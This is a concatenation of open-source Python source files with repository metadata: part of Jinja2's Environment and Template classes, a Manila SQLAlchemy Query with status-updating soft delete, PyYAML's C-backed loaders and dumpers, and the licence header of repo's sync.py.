exception_handler = None exception_formatter = None def __init__(self, block_start_string=BLOCK_START_STRING, block_end_string=BLOCK_END_STRING, variable_start_string=VARIABLE_START_STRING, variable_end_string=VARIABLE_END_STRING, comment_start_string=COMMENT_START_STRING, comment_end_string=COMMENT_END_STRING, line_statement_prefix=LINE_STATEMENT_PREFIX, line_comment_prefix=LINE_COMMENT_PREFIX, trim_blocks=TRIM_BLOCKS, lstrip_blocks=LSTRIP_BLOCKS, newline_sequence=NEWLINE_SEQUENCE, keep_trailing_newline=KEEP_TRAILING_NEWLINE, extensions=(), optimized=True, undefined=Undefined, finalize=None, autoescape=False, loader=None, cache_size=50, auto_reload=True, bytecode_cache=None): # !!Important notice!! # The constructor accepts quite a few arguments that should be # passed by keyword rather than position. However it's important to # not change the order of arguments because it's used at least # internally in those cases: # - spontaneous environments (i18n extension and Template) # - unittests # If parameter changes are required only add parameters at the end # and don't change the arguments (or the defaults!) of the arguments # existing already. 
# lexer / parser information self.block_start_string = block_start_string self.block_end_string = block_end_string self.variable_start_string = variable_start_string self.variable_end_string = variable_end_string self.comment_start_string = comment_start_string self.comment_end_string = comment_end_string self.line_statement_prefix = line_statement_prefix self.line_comment_prefix = line_comment_prefix self.trim_blocks = trim_blocks self.lstrip_blocks = lstrip_blocks self.newline_sequence = newline_sequence self.keep_trailing_newline = keep_trailing_newline # runtime information self.undefined = undefined self.optimized = optimized self.finalize = finalize self.autoescape = autoescape # defaults self.filters = DEFAULT_FILTERS.copy() self.tests = DEFAULT_TESTS.copy() self.globals = DEFAULT_NAMESPACE.copy() # set the loader provided self.loader = loader self.cache = create_cache(cache_size) self.bytecode_cache = bytecode_cache self.auto_reload = auto_reload # load extensions self.extensions = load_extensions(self, extensions) _environment_sanity_check(self) def add_extension(self, extension): """Adds an extension after the environment was created. .. versionadded:: 2.5 """ self.extensions.update(load_extensions(self, [extension])) def extend(self, **attributes): """Add the items to the instance of the environment if they do not exist yet. This is used by :ref:`extensions <writing-extensions>` to register callbacks and configuration values without breaking inheritance. 
""" for key, value in iteritems(attributes): if not hasattr(self, key): setattr(self, key, value) def overlay(self, block_start_string=missing, block_end_string=missing, variable_start_string=missing, variable_end_string=missing, comment_start_string=missing, comment_end_string=missing, line_statement_prefix=missing, line_comment_prefix=missing, trim_blocks=missing, lstrip_blocks=missing, extensions=missing, optimized=missing, undefined=missing, finalize=missing, autoescape=missing, loader=missing, cache_size=missing, auto_reload=missing, bytecode_cache=missing): """Create a new overlay environment that shares all the data with the current environment except of cache and the overridden attributes. Extensions cannot be removed for an overlayed environment. An overlayed environment automatically gets all the extensions of the environment it is linked to plus optional extra extensions. Creating overlays should happen after the initial environment was set up completely. Not all attributes are truly linked, some are just copied over so modifications on the original environment may not shine through. 
""" args = dict(locals()) del args['self'], args['cache_size'], args['extensions'] rv = object.__new__(self.__class__) rv.__dict__.update(self.__dict__) rv.overlayed = True rv.linked_to = self for key, value in iteritems(args): if value is not missing: setattr(rv, key, value) if cache_size is not missing: rv.cache = create_cache(cache_size) else: rv.cache = copy_cache(self.cache) rv.extensions = {} for key, value in iteritems(self.extensions): rv.extensions[key] = value.bind(rv) if extensions is not missing: rv.extensions.update(load_extensions(rv, extensions)) return _environment_sanity_check(rv) lexer = property(get_lexer, doc="The lexer for this environment.") def iter_extensions(self): """Iterates over the extensions by priority.""" return iter(sorted(self.extensions.values(), key=lambda x: x.priority)) def getitem(self, obj, argument): """Get an item or attribute of an object but prefer the item.""" try: return obj[argument] except (TypeError, LookupError): if isinstance(argument, string_types): try: attr = str(argument) except Exception: pass else: try: return getattr(obj, attr) except AttributeError: pass return self.undefined(obj=obj, name=argument) def getattr(self, obj, attribute): """Get an item or attribute of an object but prefer the attribute. Unlike :meth:`getitem` the attribute *must* be a bytestring. """ try: return getattr(obj, attribute) except AttributeError: pass try: return obj[attribute] except (TypeError, LookupError, AttributeError): return self.undefined(obj=obj, name=attribute) def call_filter(self, name, value, args=None, kwargs=None, context=None, eval_ctx=None): """Invokes a filter on a value the same way the compiler does it. .. 
        versionadded:: 2.7
        """
        func = self.filters.get(name)
        if func is None:
            raise TemplateRuntimeError('no filter named %r' % name)
        args = [value] + list(args or ())
        # Honor the same filter decorators the compiler honors: context-,
        # eval-context- and environment-filters get their extra first argument.
        if getattr(func, 'contextfilter', False):
            if context is None:
                raise TemplateRuntimeError('Attempted to invoke context '
                                           'filter without context')
            args.insert(0, context)
        elif getattr(func, 'evalcontextfilter', False):
            if eval_ctx is None:
                # Derive an eval context from the template context if we have
                # one, otherwise build a fresh one for this environment.
                if context is not None:
                    eval_ctx = context.eval_ctx
                else:
                    eval_ctx = EvalContext(self)
            args.insert(0, eval_ctx)
        elif getattr(func, 'environmentfilter', False):
            args.insert(0, self)
        return func(*args, **(kwargs or {}))

    def call_test(self, name, value, args=None, kwargs=None):
        """Invokes a test on a value the same way the compiler does it.

        .. versionadded:: 2.7
        """
        func = self.tests.get(name)
        if func is None:
            raise TemplateRuntimeError('no test named %r' % name)
        return func(value, *(args or ()), **(kwargs or {}))

    @internalcode
    def parse(self, source, name=None, filename=None):
        """Parse the sourcecode and return the abstract syntax tree.  This
        tree of nodes is used by the compiler to convert the template into
        executable source- or bytecode.  This is useful for debugging or to
        extract information from templates.

        If you are :ref:`developing Jinja2 extensions <writing-extensions>`
        this gives you a good overview of the node tree generated.
        """
        try:
            return self._parse(source, name, filename)
        except TemplateSyntaxError:
            # Capture and re-dispatch through the environment's exception
            # machinery so tracebacks can be rewritten for templates.
            exc_info = sys.exc_info()
        self.handle_exception(exc_info, source_hint=source)

    def _parse(self, source, name, filename):
        """Internal parsing function used by `parse` and `compile`."""
        return Parser(self, source, name, encode_filename(filename)).parse()

    def lex(self, source, name=None, filename=None):
        """Lex the given sourcecode and return a generator that yields
        tokens as tuples in the form ``(lineno, token_type, value)``.
        This can be useful for :ref:`extension development <writing-extensions>`
        and debugging templates.

        This does not perform preprocessing.
        If you want the preprocessing of the extensions to be applied you
        have to filter source through the :meth:`preprocess` method.
        """
        source = text_type(source)
        try:
            return self.lexer.tokeniter(source, name, filename)
        except TemplateSyntaxError:
            exc_info = sys.exc_info()
        self.handle_exception(exc_info, source_hint=source)

    def preprocess(self, source, name=None, filename=None):
        """Preprocesses the source with all extensions.  This is automatically
        called for all parsing and compiling methods but *not* for :meth:`lex`
        because there you usually only want the actual source tokenized.
        """
        # Chain every extension's preprocess() over the source, in priority
        # order, starting from the raw text.
        return reduce(lambda s, e: e.preprocess(s, name, filename),
                      self.iter_extensions(), text_type(source))

    def _tokenize(self, source, name, filename=None, state=None):
        """Called by the parser to do the preprocessing and filtering
        for all the extensions.  Returns a :class:`~jinja2.lexer.TokenStream`.
        """
        source = self.preprocess(source, name, filename)
        stream = self.lexer.tokenize(source, name, filename, state)
        for ext in self.iter_extensions():
            stream = ext.filter_stream(stream)
        # An extension may return a plain iterable; normalize to TokenStream.
        if not isinstance(stream, TokenStream):
            stream = TokenStream(stream, name, filename)
        return stream

    def _generate(self, source, name, filename, defer_init=False):
        """Internal hook that can be overridden to hook a different
        generate method in.

        .. versionadded:: 2.5
        """
        return generate(source, self, name, filename, defer_init=defer_init)

    def _compile(self, source, filename):
        """Internal hook that can be overridden to hook a different
        compile method in.

        .. versionadded:: 2.5
        """
        return compile(source, filename, 'exec')

    @internalcode
    def compile(self, source, name=None, filename=None, raw=False,
                defer_init=False):
        """Compile a node or template source code.  The `name` parameter is
        the load name of the template after it was joined using
        :meth:`join_path` if necessary, not the filename on the file system.
        the `filename` parameter is the estimated filename of the template on
        the file system.
        If the template came from a database or memory this can be omitted.

        The return value of this method is a python code object.  If the `raw`
        parameter is `True` the return value will be a string with python
        code equivalent to the bytecode returned otherwise.  This method is
        mainly used internally.

        `defer_init` is use internally to aid the module code generator.  This
        causes the generated code to be able to import without the global
        environment variable to be set.

        .. versionadded:: 2.4
           `defer_init` parameter added.
        """
        source_hint = None
        try:
            if isinstance(source, string_types):
                # Keep the raw text around so syntax errors can point at it.
                source_hint = source
                source = self._parse(source, name, filename)
            if self.optimized:
                source = optimize(source, self)
            # AST -> python source; with raw=True the caller gets this string.
            source = self._generate(source, name, filename,
                                    defer_init=defer_init)
            if raw:
                return source
            if filename is None:
                filename = '<template>'
            else:
                filename = encode_filename(filename)
            return self._compile(source, filename)
        except TemplateSyntaxError:
            exc_info = sys.exc_info()
        self.handle_exception(exc_info, source_hint=source_hint)

    def compile_expression(self, source, undefined_to_none=True):
        """A handy helper method that returns a callable that accepts keyword
        arguments that appear as variables in the expression.  If called it
        returns the result of the expression.

        This is useful if applications want to use the same rules as Jinja
        in template "configuration files" or similar situations.

        Example usage:

        >>> env = Environment()
        >>> expr = env.compile_expression('foo == 42')
        >>> expr(foo=23)
        False
        >>> expr(foo=42)
        True

        Per default the return value is converted to `None` if the
        expression returns an undefined value.  This can be changed
        by setting `undefined_to_none` to `False`.

        >>> env.compile_expression('var')() is None
        True
        >>> env.compile_expression('var', undefined_to_none=False)()
        Undefined

        ..
        versionadded:: 2.1
        """
        parser = Parser(self, source, state='variable')
        exc_info = None
        try:
            expr = parser.parse_expression()
            # Anything left over after the expression is a syntax error.
            if not parser.stream.eos:
                raise TemplateSyntaxError('chunk after expression',
                                          parser.stream.current.lineno,
                                          None, None)
            expr.set_environment(self)
        except TemplateSyntaxError:
            exc_info = sys.exc_info()
        if exc_info is not None:
            self.handle_exception(exc_info, source_hint=source)
        # Wrap the expression into a one-assignment template so the normal
        # template machinery can evaluate it; the result lands in ``result``.
        body = [nodes.Assign(nodes.Name('result', 'store'), expr, lineno=1)]
        template = self.from_string(nodes.Template(body, lineno=1))
        return TemplateExpression(template, undefined_to_none)

    def compile_templates(self, target, extensions=None, filter_func=None,
                          zip='deflated', log_function=None,
                          ignore_errors=True, py_compile=False):
        """Finds all the templates the loader can find, compiles them
        and stores them in `target`.  If `zip` is `None`, instead of in a
        zipfile, the templates will be will be stored in a directory.
        By default a deflate zip algorithm is used, to switch to
        the stored algorithm, `zip` can be set to ``'stored'``.

        `extensions` and `filter_func` are passed to :meth:`list_templates`.
        Each template returned will be compiled to the target folder or
        zipfile.

        By default template compilation errors are ignored.  In case a
        log function is provided, errors are logged.  If you want template
        syntax errors to abort the compilation you can set `ignore_errors`
        to `False` and you will get an exception on syntax errors.

        If `py_compile` is set to `True` .pyc files will be written to the
        target instead of standard .py files.  This flag does not do anything
        on pypy and Python 3 where pyc files are not picked up by itself and
        don't give much benefit.

        ..
        versionadded:: 2.4
        """
        from jinja2.loaders import ModuleLoader

        if log_function is None:
            log_function = lambda x: None

        if py_compile:
            if not PY2 or PYPY:
                # Byte-compilation is only meaningful on CPython 2.
                from warnings import warn
                warn(Warning('py_compile has no effect on pypy or Python 3'))
                py_compile = False
            else:
                import imp, marshal
                # pyc header: magic number plus a dummy timestamp.
                py_header = imp.get_magic() + \
                    u'\xff\xff\xff\xff'.encode('iso-8859-15')

                # Python 3.3 added a source filesize to the header
                if sys.version_info >= (3, 3):
                    py_header += u'\x00\x00\x00\x00'.encode('iso-8859-15')

        def write_file(filename, data, mode):
            # Write either into the open zipfile or the target directory.
            if zip:
                info = ZipInfo(filename)
                # Mark entries executable/readable (0755) in the zip.
                info.external_attr = 0o755 << 16
                zip_file.writestr(info, data)
            else:
                f = open(os.path.join(target, filename), mode)
                try:
                    f.write(data)
                finally:
                    f.close()

        if zip is not None:
            from zipfile import ZipFile, ZipInfo, ZIP_DEFLATED, ZIP_STORED
            zip_file = ZipFile(target, 'w', dict(deflated=ZIP_DEFLATED,
                                                 stored=ZIP_STORED)[zip])
            log_function('Compiling into Zip archive "%s"' % target)
        else:
            if not os.path.isdir(target):
                os.makedirs(target)
            log_function('Compiling into folder "%s"' % target)

        try:
            for name in self.list_templates(extensions, filter_func):
                source, filename, _ = self.loader.get_source(self, name)
                try:
                    # raw=True, defer_init=True: get python source suited
                    # for the module loader.
                    code = self.compile(source, name, filename, True, True)
                except TemplateSyntaxError as e:
                    if not ignore_errors:
                        raise
                    log_function('Could not compile "%s": %s' % (name, e))
                    continue

                filename = ModuleLoader.get_module_filename(name)

                if py_compile:
                    c = self._compile(code, encode_filename(filename))
                    write_file(filename + 'c', py_header +
                               marshal.dumps(c), 'wb')
                    log_function('Byte-compiled "%s" as %s' %
                                 (name, filename + 'c'))
                else:
                    write_file(filename, code, 'w')
                    log_function('Compiled "%s" as %s' %
                                 (name, filename))
        finally:
            if zip:
                zip_file.close()

        log_function('Finished compiling templates')

    def list_templates(self, extensions=None, filter_func=None):
        """Returns a list of templates for this environment.  This requires
        that the loader supports the loader's
        :meth:`~BaseLoader.list_templates` method.
        If there are other files in the template folder besides the
        actual templates, the returned list can be filtered.  There are two
        ways: either `extensions` is set to a list of file extensions for
        templates, or a `filter_func` can be provided which is a callable that
        is passed a template name and should return `True` if it should end up
        in the result list.

        If the loader does not support that, a :exc:`TypeError` is raised.

        .. versionadded:: 2.4
        """
        x = self.loader.list_templates()
        if extensions is not None:
            # ``extensions`` is sugar for a suffix-matching filter_func;
            # the two are mutually exclusive.
            if filter_func is not None:
                raise TypeError('either extensions or filter_func '
                                'can be passed, but not both')
            filter_func = lambda x: '.' in x and \
                x.rsplit('.', 1)[1] in extensions
        if filter_func is not None:
            x = ifilter(filter_func, x)
        return x

    def handle_exception(self, exc_info=None, rendered=False, source_hint=None):
        """Exception handling helper.  This is used internally to either raise
        rewritten exceptions or return a rendered traceback for the template.
        """
        global _make_traceback
        if exc_info is None:
            exc_info = sys.exc_info()

        # the debugging module is imported when it's used for the first time.
        # we're doing a lot of stuff there and for applications that do not
        # get any exceptions in template rendering there is no need to load
        # all of that.
        if _make_traceback is None:
            from jinja2.debug import make_traceback as _make_traceback
        traceback = _make_traceback(exc_info, source_hint)
        if rendered and self.exception_formatter is not None:
            return self.exception_formatter(traceback)
        if self.exception_handler is not None:
            self.exception_handler(traceback)
        exc_type, exc_value, tb = traceback.standard_exc_info
        reraise(exc_type, exc_value, tb)

    def join_path(self, template, parent):
        """Join a template with the parent.  By default all the lookups are
        relative to the loader root so this method returns the `template`
        parameter unchanged, but if the paths should be relative to the
        parent template, this function can be used to calculate the real
        template name.
        Subclasses may override this method and implement template path
        joining here.
        """
        return template

    @internalcode
    def _load_template(self, name, globals):
        """Load ``name`` through the loader, going through the cache first."""
        if self.loader is None:
            raise TypeError('no loader for this environment specified')
        if self.cache is not None:
            template = self.cache.get(name)
            # A cached template is reused unless auto_reload is on and the
            # template reports itself out of date.
            if template is not None and (not self.auto_reload or
                                         template.is_up_to_date):
                return template
        template = self.loader.load(self, name, globals)
        if self.cache is not None:
            self.cache[name] = template
        return template

    @internalcode
    def get_template(self, name, parent=None, globals=None):
        """Load a template from the loader.  If a loader is configured this
        method ask the loader for the template and returns a :class:`Template`.
        If the `parent` parameter is not `None`, :meth:`join_path` is called
        to get the real template name before loading.

        The `globals` parameter can be used to provide template wide globals.
        These variables are available in the context at render time.

        If the template does not exist a :exc:`TemplateNotFound` exception is
        raised.

        .. versionchanged:: 2.4
           If `name` is a :class:`Template` object it is returned from the
           function unchanged.
        """
        # Passing through Template objects makes this safe to call with the
        # result of a previous lookup.
        if isinstance(name, Template):
            return name
        if parent is not None:
            name = self.join_path(name, parent)
        return self._load_template(name, self.make_globals(globals))

    @internalcode
    def select_template(self, names, parent=None, globals=None):
        """Works like :meth:`get_template` but tries a number of templates
        before it fails.  If it cannot find any of the templates, it will
        raise a :exc:`TemplatesNotFound` exception.

        .. versionadded:: 2.3

        .. versionchanged:: 2.4
           If `names` contains a :class:`Template` object it is returned
           from the function unchanged.
""" if not names: raise TemplatesNotFound(message=u'Tried to select from an empty list ' u'of templates.') globals = self.make_globals(globals) for name in names: if isinstance(name, Template): return name if parent is not None: name = self.join_path(name, parent) try: return self._load_template(name, globals) except TemplateNotFound: pass raise TemplatesNotFound(names) @internalcode def get_or_select_template(self, template_name_or_list, parent=None, globals=None): """Does a typecheck and dispatches to :meth:`select_template` if an iterable of template names is given, otherwise to :meth:`get_template`. .. versionadded:: 2.3 """ if isinstance(template_name_or_list, string_types): return self.get_template(template_name_or_list, parent, globals) elif isinstance(template_name_or_list, Template): return template_name_or_list return self.select_template(template_name_or_list, parent, globals) def from_string(self, source, globals=None, template_class=None): """Load a template from a string. This parses the source given and returns a :class:`Template` object. """ globals = self.make_globals(globals) cls = template_class or self.template_class return cls.from_code(self, self.compile(source), globals, None) def make_globals(self, d): """Return a dict for the globals.""" if not d: return self.globals return dict(self.globals, **d) class Template(object): """The central template object. This class represents a compiled template and is used to evaluate it. Normally the template object is generated from an :class:`Environment` but it also has a constructor that makes it possible to create a template instance directly using the constructor. It takes the same arguments as the environment constructor but it's not possible to specify a loader. Every template object has a few methods and members that are guaranteed to exist. However it's important that a template object should be considered immutable. Modifications on the object are not supported. 
    Template objects created from the constructor rather than an environment
    do have an `environment` attribute that points to a temporary environment
    that is probably shared with other templates created with the constructor
    and compatible settings.

    >>> template = Template('Hello {{ name }}!')
    >>> template.render(name='John Doe')
    u'Hello John Doe!'

    >>> stream = template.stream(name='John Doe')
    >>> stream.next()
    u'Hello John Doe!'
    >>> stream.next()
    Traceback (most recent call last):
        ...
    StopIteration
    """

    def __new__(cls, source,
                block_start_string=BLOCK_START_STRING,
                block_end_string=BLOCK_END_STRING,
                variable_start_string=VARIABLE_START_STRING,
                variable_end_string=VARIABLE_END_STRING,
                comment_start_string=COMMENT_START_STRING,
                comment_end_string=COMMENT_END_STRING,
                line_statement_prefix=LINE_STATEMENT_PREFIX,
                line_comment_prefix=LINE_COMMENT_PREFIX,
                trim_blocks=TRIM_BLOCKS,
                lstrip_blocks=LSTRIP_BLOCKS,
                newline_sequence=NEWLINE_SEQUENCE,
                keep_trailing_newline=KEEP_TRAILING_NEWLINE,
                extensions=(),
                optimized=True,
                undefined=Undefined,
                finalize=None,
                autoescape=False):
        # Direct construction goes through a shared "spontaneous" environment
        # keyed on the settings; the returned object comes from from_string().
        env = get_spontaneous_environment(
            block_start_string, block_end_string, variable_start_string,
            variable_end_string, comment_start_string, comment_end_string,
            line_statement_prefix, line_comment_prefix, trim_blocks,
            lstrip_blocks, newline_sequence, keep_trailing_newline,
            frozenset(extensions), optimized, undefined, finalize, autoescape,
            None, 0, False, None)
        return env.from_string(source, template_class=cls)

    @classmethod
    def from_code(cls, environment, code, globals, uptodate=None):
        """Creates a template object from compiled code and the globals.  This
        is used by the loaders and environment to create a template object.
""" namespace = { 'environment': environment, '__file__': code.co_filename } exec(code, namespace) rv = cls._from_namespace(environment, namespace, globals) rv._uptodate = uptodate return rv @classmethod def from_module_dict(cls, environment, module_dict, globals): """Creates a template object from a module. This is used by the module loader to create a template object. .. versionadded:: 2.4 """ return cls._from_namespace(environment, module_dict, globals) @classmethod def _from_namespace(cls, environment, namespace, globals): t = object.__new__(cls) t.environment = environment t.globals = globals t.name = namespace['name'] t.filename = namespace['__file__'] t.blocks = namespace['blocks'] # render function and module t.root_render_func = namespace['root'] t._module = None # debug and loader helpers t._debug_info = namespace['debug_info'] t._uptodate = None # store the reference namespace['environment'] = environment namespace['__jinja_template__'] = t return t def render(self, *args, **kwargs): """This method accepts the same arguments as the `dict` constructor: A dict, a dict subclass or some keyword arguments. If no arguments are given the context will be empty. These two calls do the same:: template.render(knights='that say nih') template.render({'knights': 'that say nih'}) This will return the rendered template as unicode string. """ vars = dict(*args, **kwargs) try: return concat(self.root_render_func(self.new_context(vars))) except Exception: exc_info = sys.exc_info() return self.environment.handle_exception(exc_info, True) def stream(self, *args, **kwargs): """Works exactly like :meth:`generate` but returns a :class:`TemplateStream`. """ return TemplateStream(self.generate(*args, **kwargs)) def generate(self, *args, **kwargs): """For very large templates it can be useful to not render the whole template at once but evaluate each statement after another and yield piece for piece. 
        This method basically does exactly that and returns a generator
        that yields one item after another as unicode strings.  It accepts
        the same arguments as :meth:`render`.
        """
        vars = dict(*args, **kwargs)
        try:
            for event in self.root_render_func(self.new_context(vars)):
                yield event
        except Exception:
            exc_info = sys.exc_info()
        else:
            # Clean completion: stop the generator without the error path.
            return
        # Error path: yield whatever the exception handler renders.
        yield self.environment.handle_exception(exc_info, True)

    def new_context(self, vars=None, shared=False, locals=None):
        """Create a new :class:`Context` for this template.  The vars
        provided will be passed to the template.  Per default the globals
        are added to the context.  If shared is set to `True` the data
        is passed as it to the context without adding the globals.

        `locals` can be a dict of local variables for internal usage.
        """
        return new_context(self.environment, self.name, self.blocks,
                           vars, shared, self.globals, locals)

    def make_module(self, vars=None, shared=False, locals=None):
        """This method works like the :attr:`module` attribute when called
        without arguments but it will evaluate the template on every call
        rather than caching it.  It's also possible to provide
        a dict which is then used as context.  The arguments are the same
        as for the :meth:`new_context` method.
        """
        return TemplateModule(self, self.new_context(vars, shared, locals))

    @property
    def module(self):
        """The template as module.  This is used for imports in the
        template runtime but is also useful if one wants to access
        exported template variables from the Python layer:

        >>> t = Template('{% macro foo() %}42{% endmacro %}23')
        >>> unicode(t.module)
        u'23'
        >>> t.module.foo()
        u'42'
        """
        # Cached on first access; make_module() re-renders every time.
        if self._module is not None:
            return self._module
        self._module = rv = self.make_module()
        return rv

    def get_corresponding_lineno(self, lineno):
        """Return the source line number of a line number in the
        generated bytecode as they are not in sync.
""" for template_line, code_line in reversed(self.debug_info): if code_line <= lineno: return template_line return 1 @property def is_up_to_date(self): """If this variable is `False` there is a newer version available.""" if self._uptodate is None: return True return self._uptodate() @property def debug_info(self): """The debug info mapping.""" return [tuple(imap(int, x.split('='))) for x in self._debug_info.split('&')] def __repr__(self): if self.name is None: name = 'memory:%x' % id(self) else: name = repr(self.name) return '<%s %s>' % (self.__class__.__name__, name) @implements_to_string class TemplateModule(object): """Represents an imported template. All the exported names of the template are available as attributes on this object. Additionally converting it into an unicode- or bytestrings renders the contents. """ def __init__(self, template, context): self._body_stream = list(template.root_render_func(context)) self.__dict__.update(context.get_exported()) self.__name__ = template.name def __html__(self): return Markup(concat(self._body_stream)) def __str__(self): return concat(self._body_stream) def __repr__(self): if self.__name__ is None: name = 'memory:%x' % id(self) else: name = repr(self.__name__) return '<%s %s>' % (self.__class__.__name__, name) class TemplateExpression(object): """The :meth:`jinja2.Environment.compile_expression` method returns an instance of this object. It encapsulates the expression-like access to the template with an expression it wraps. 
""" def __init__(self, template, undefined_to_none): self._template = template self._undefined_to_none = undefined_to_none def __call__(self, *args, **kwargs): context = self._template.new_context(dict(*args, **kwargs)) consume(self._template.root_render_func(context)) rv = context.vars['result'] if self._undefined_to_none and isinstance(rv, Undefined): rv = None return rv @implements_iterator class TemplateStream(object): """A template stream works pretty much like an ordinary python generator but it can buffer multiple items to reduce the number of total iterations. Per default the output is unbuffered which means that for every unbuffered instruction in the template one unicode string is yielded. If buffering is enabled with a buffer size of 5, five items are combined into a new unicode string. This is mainly useful if you are streaming big templates to a client via WSGI which flushes after each iteration. """ def __init__(self, gen): self._gen = gen self.disable_buffering() def dump(self, fp, encoding=None, errors='strict'): """Dump the complete stream into a file or file-like object. Per default unicode strings are written, if you want to encode before writing specify an `encoding`. Example usage:: Template('Hello {{ name }}!').stream(name='foo').dump('hello.html') """ close = False if isinstance(fp, string_types): fp = open(fp, encoding is None and 'w' or 'wb') close = True try: if encoding is not None: iterable = (x.encode(encoding, errors) for x in self) else: iterable = self if hasattr(fp, 'writelines'): fp.writelines(iterable) else: for item in iterable: fp.write(item) finally: if close: fp.close() def disable_buffering(self): """Disable the output buffering.""" self._next = get_next(self._gen) self.buffered = False def enable_buffering(self, size=5): """Enable buffering. 
        Buffer `size` items before yielding them."""
        if size <= 1:
            raise ValueError('buffer size too small')

        def generator(next):
            buf = []
            c_size = 0
            push = buf.append

            while 1:
                try:
                    # Collect up to ``size`` truthy chunks before flushing.
                    while c_size < size:
                        c = next()
                        push(c)
                        if c:
                            c_size += 1
                except StopIteration:
                    # Flush whatever is left, then finish.
                    if not c_size:
                        return
                yield concat(buf)
                del buf[:]
                c_size = 0

        self.buffered = True
        self._next = get_next(generator(get_next(self._gen)))

    def __iter__(self):
        return self

    def __next__(self):
        return self._next()


# hook in default template class.  if anyone reads this comment: ignore that
# it's possible to use custom templates ;-)
Environment.template_class = Template
bsd-3-clause
sajuptpm/manila
manila/db/sqlalchemy/query.py
8
1547
# Copyright 2015 Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

"""Custom SQLAlchemy Query that can flip a status column while soft-deleting."""

from oslo_db.sqlalchemy import orm
import sqlalchemy

from manila.common import constants


class Query(orm.Query):
    """oslo_db Query with an extended ``soft_delete``.

    In addition to the normal oslo_db soft delete, the matched rows'
    status column can be set to ``STATUS_DELETED`` in the same call.
    """

    def soft_delete(self, synchronize_session='evaluate', update_status=False,
                    status_field_name='status'):
        """Soft delete the rows matched by this query.

        :param synchronize_session: passed through to ``Query.update`` /
            oslo_db ``soft_delete``.
        :param update_status: when True, also set the rows' status column
            (named by ``status_field_name``) to ``constants.STATUS_DELETED``.
        :param status_field_name: name of the status column to update.
        :returns: whatever oslo_db's ``soft_delete`` returns (row count).
        """
        if update_status:
            # BUG FIX: the original did
            #     setattr(self, status_field_name, constants.STATUS_DELETED)
            # which only sets a Python attribute on this Query instance and
            # never touches the database rows.  Issue a real bulk UPDATE on
            # the matched rows instead.
            self.update({status_field_name: constants.STATUS_DELETED},
                        synchronize_session=synchronize_session)
        return super(Query, self).soft_delete(synchronize_session)


def get_maker(engine, autocommit=True, expire_on_commit=False):
    """Return a SQLAlchemy sessionmaker using the given engine."""
    return sqlalchemy.orm.sessionmaker(bind=engine,
                                       class_=orm.Session,
                                       autocommit=autocommit,
                                       expire_on_commit=expire_on_commit,
                                       query_cls=Query)


# NOTE(uglide): Monkey patch oslo_db get_maker() function to use custom Query
orm.get_maker = get_maker
apache-2.0
lavjain/incubator-hawq
tools/bin/ext/yaml/cyaml.py
125
3233
"""libyaml-backed Loader/Dumper classes.

Each class pairs the C parser/emitter from ``_yaml`` with the pure-Python
constructor/representer/resolver layers, mirroring the pure-Python
Loader/Dumper hierarchy.
"""

__all__ = ['CBaseLoader', 'CSafeLoader', 'CLoader',
           'CBaseDumper', 'CSafeDumper', 'CDumper']

from _yaml import CParser, CEmitter

# Python 2 implicit relative imports (this module lives inside the yaml
# package); they pull in the *Constructor, *Representer and Resolver classes.
from constructor import *
from serializer import *
from representer import *
from resolver import *


class CBaseLoader(CParser, BaseConstructor, BaseResolver):
    """C parser + base (tag-agnostic) construction and resolution."""

    def __init__(self, stream):
        CParser.__init__(self, stream)
        BaseConstructor.__init__(self)
        BaseResolver.__init__(self)


class CSafeLoader(CParser, SafeConstructor, Resolver):
    """C parser + safe construction (only standard YAML tags)."""

    def __init__(self, stream):
        CParser.__init__(self, stream)
        SafeConstructor.__init__(self)
        Resolver.__init__(self)


class CLoader(CParser, Constructor, Resolver):
    """C parser + full construction (can build arbitrary Python objects)."""

    def __init__(self, stream):
        CParser.__init__(self, stream)
        Constructor.__init__(self)
        Resolver.__init__(self)


class CBaseDumper(CEmitter, BaseRepresenter, BaseResolver):
    """C emitter + base representation and resolution."""

    def __init__(self, stream,
                 default_style=None, default_flow_style=None,
                 canonical=None, indent=None, width=None,
                 allow_unicode=None, line_break=None,
                 encoding=None, explicit_start=None, explicit_end=None,
                 version=None, tags=None):
        CEmitter.__init__(self, stream, canonical=canonical,
                          indent=indent, width=width, encoding=encoding,
                          allow_unicode=allow_unicode, line_break=line_break,
                          explicit_start=explicit_start,
                          explicit_end=explicit_end,
                          version=version, tags=tags)
        # CONSISTENCY FIX: the original initialized Representer/Resolver here,
        # which are not this class's bases; that only worked because neither
        # subclass defines its own __init__.  Initialize the declared bases.
        BaseRepresenter.__init__(self, default_style=default_style,
                                 default_flow_style=default_flow_style)
        BaseResolver.__init__(self)


class CSafeDumper(CEmitter, SafeRepresenter, Resolver):
    """C emitter + safe representation (only standard YAML tags)."""

    def __init__(self, stream,
                 default_style=None, default_flow_style=None,
                 canonical=None, indent=None, width=None,
                 allow_unicode=None, line_break=None,
                 encoding=None, explicit_start=None, explicit_end=None,
                 version=None, tags=None):
        CEmitter.__init__(self, stream, canonical=canonical,
                          indent=indent, width=width, encoding=encoding,
                          allow_unicode=allow_unicode, line_break=line_break,
                          explicit_start=explicit_start,
                          explicit_end=explicit_end,
                          version=version, tags=tags)
        SafeRepresenter.__init__(self, default_style=default_style,
                                 default_flow_style=default_flow_style)
        Resolver.__init__(self)


class CDumper(CEmitter, Serializer, Representer, Resolver):
    """C emitter + full representation (can dump arbitrary Python objects).

    NOTE(review): the Serializer base is never initialized here -- the C
    emitter performs serialization itself -- presumably kept only for
    interface parity with the pure-Python Dumper.  TODO confirm.
    """

    def __init__(self, stream,
                 default_style=None, default_flow_style=None,
                 canonical=None, indent=None, width=None,
                 allow_unicode=None, line_break=None,
                 encoding=None, explicit_start=None, explicit_end=None,
                 version=None, tags=None):
        CEmitter.__init__(self, stream, canonical=canonical,
                          indent=indent, width=width, encoding=encoding,
                          allow_unicode=allow_unicode, line_break=line_break,
                          explicit_start=explicit_start,
                          explicit_end=explicit_end,
                          version=version, tags=tags)
        Representer.__init__(self, default_style=default_style,
                             default_flow_style=default_flow_style)
        Resolver.__init__(self)
apache-2.0
muzili/repo
subcmds/sync.py
18
14938
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
